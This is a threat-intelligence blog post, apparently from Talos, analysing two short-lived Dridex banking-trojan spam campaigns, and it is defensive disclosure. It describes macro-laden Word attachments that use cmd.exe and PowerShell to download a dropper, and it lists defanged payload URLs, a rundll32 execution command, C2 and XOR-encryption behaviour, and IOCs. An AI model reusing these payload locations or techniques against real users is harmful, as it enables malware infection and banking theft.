This post was authored by Nick Biasini with contributions from Kevin Brooks.
Overview
The use of macro enabled word documents has exploded over the last year, a primary example payload being Dridex. Last week, Talos researchers identified another short lived spam campaign that was delivering a new variant of Dridex. This particular campaign lasted less than five hours and was successful at mutating the subject and attachments to avoid detection. The five hour campaign actually consisted of two separate emails that both had malicious word documents as attachments. A sample of the two different subject lines are shown below.
Campaign One Subject:
Debit Note [97994] information attached to this email
Campaign Two Subject:
48142 - Your Latest Documents from RS Components 822379272
*Note: Italicized text used to identify mutating portions of email subject
Both campaigns centered on invoices being sent as word document attachments. Not only did the attackers use different subjects for every email they also rarely reused an attachment name. Less than five percent of the emails observed contained re-used attachment names.
Campaign One
Sample Email from First Dridex Spam Campaign. Note it has a blank body. |
The emails made use of unique sender email addresses, subjects, and attachments for each spam message sent. The attachment name consisted of word document with a filename consisting of eight random digits. Below are a couple of the sample file names that were observed in Talos telemetry data.
- 79198977.doc
- 33713908.doc
- 36917816.doc
- 25372173.doc
- 51230292.doc
- 74953293.doc One odd characteristic of this campaign was that the body of the email itself was completely blank. However, if a user did open the attachment they were presented with a word document with no legible text similar to what is shown below.
Example of Malicious Word Document |
Behind the scenes a macro was using cmd.exe, leveraging powershell, to download and execute a malicious executable from a hard coded IP address.
Dropper Download Example |
Campaign Two
Sample Email from Second Dridex Spam Campaign |
The second campaign is closer to an actual legitimate email than the first. It references a specific account and invoice number with an attached word document posing as the invoice. When opened, it serves the same basic content as shown above, a non-legible word doc, that downloads a file via macros using cmd.exe and powershell. Both campaigns downloaded the same file from a range of different addresses. Thorough analysis of the samples revealed five unique IP addresses were used to serve the same executable from the same path. The list of all five URLs are below:
- hxxp://185.39.149.21/jsaxo8u/g39b2cx.exe
- hxxp://31.41.45.197/jsaxo8u/g39b2cx.exe
- hxxp://185.91.175.64/jsaxo8u/g39b2cx.exe
- hxxp://93.26.217.203/jsaxo8u/g39b2cx.exe
- hxxp://193.26.217.203/jsaxo8u/g39b2cx.exe The naming convention for the word documents attached to these emails was slightly different. All files began with “G-A”, followed by 22 random digits, and then a “-1” (i.e. “G-A4123477405172464507071-1.doc”). Below is a list of some of the file names that were seen during the campaign.
- G-A3865729716193015411461-1.doc
- G-A1382739323079843453063-1.doc
- G-A0623523338554327335109-1.doc
- G-A6805305480653463953155-1.doc
- G-A7904953421619636467435-1.doc
- G-A0647500403036858451034-1.doc
Dridex Analysis
The PE that was dropped by from the word document has been identified as a variant of Dridex. Dridex is a banking trojan, an evolution of Cridex, that Talos has covered previously. This particular sample marks the fourth different variation that Talos has analyzed over the last several months. The dropped file copies itself to the local %AppData% folder, creates a mutex, and establishes a connection with the C2 servers over port 8080. Once a connection is established, the host sends an XOR encrypted message containing the computer name, OS version, and currently installed programs, including version numbers. The C2 server responds with a DLL download which is copied on the infected system as a .tmp file. The DLL is then executed via the command line with a command similar to the following:
'rundll32.exe "C:\DOCUME~1\ADMINI~1\LOCALS~1\APPLIC~1\4A.tmp" NotifierInit'
Upon execution the Dridex code is injected in Explorer.exe and the original file is deleted. This injected code has C2 capabilities and continues to contact the server. The changes in this variant are primarily associated with this continuing communication and the construction of the HTTP POST requests. The POST header is generated by selecting the User Agent, Content-Type, and Referrer data from a hard coded list, a couple examples of which are below:
Sample Header Values from Dridex |
The one characteristic unique to this variant is a change associated with the host field. In previous variants the host field was made up of random characters followed by a space and TLD (i.e. m3C2J0e7f7bKBYwq1z org). This variant fixed that and replaced the space with a ‘.’ making it appear closer to a legitimate host (i.e. m3C2J0e7f7bKBYwq1z.org). The actual data that is contained in the body of the POST request is encrypted with a 4-byte XOR key that is created from random bytes during the encryption process. This key is included in the POST message as the first 4 bytes preceding the data to be sent to allow the server to decrypt the data.
Detection
Detection Graph. Shaded region shows active campaign |
Initially, the Anti-Virus detections were poor for the Word documents, but they did eventually catch up. Since the campaign only lasted for approximately five hours, protection was only available for the tail end of the campaign. This is where a feature like virus outbreak filters (VOF) on the Cisco ESA is important. Using these outbreak filters messages can be quarantined for up to 12 hours by default, allowing the anti-virus vendors to catch up without the end users being infected. These filters are most effective against known questionable files, such as .exe, .zip & .scr, but in this case, they still provided 0.6 hours of lead time for the first campaign and 3.3 hours lead time for the 2nd campaign. The dropper itself did have better initial coverage and was detected by a handful of vendors immediately.
To give you an idea of how many of these spam campaigns are occurring on a regular basis, this Dridex campaign is not even in the top 20 campaigns that we are currently tracking.
http://www.senderbase.org/static/malware |
In many of these shorter campaigns, the anti-virus update can actually occur after the campaign has essentially completed as shown below in a DyrezaC malware campaign that occurred just a couple of weeks back:
Snort Rules: Please refer to Defense Center or snort.org for updated snort rules.
IOC
Hashes (SHA256)
Malicious Word Documents
Dridex Dropper (SHA256)
7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a
IP Addresses:
185.39.149.21
31.41.45.197
185.91.175.64
93.26.217.203
193.26.217.203
77.74.103.150
199.201.121.169
45.55.154.235
Conclusion
This is another example of how Spam campaigns have evolved. Previously, these campaigns continued for days or weeks and leveraged the same subject or attachment name allowing for quick detection and prevention. Today, these campaigns are short lived with mutating subjects and attachments designed specifically to avoid detection and prevention. This continues to emphasize the importance of detection through all layers of infrastructure including email, web, network and host-based.
Coverage
Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors.
CWS or WSA web scanning prevents access to malicious websites and detects malware used in these attacks.
The Network Security protection of IPS and NGFW have up-to-date signatures to detect malicious network activity by threat actors.
ESA can block malicious emails including phishing and malicious attachments sent by threat actors as part of their campaign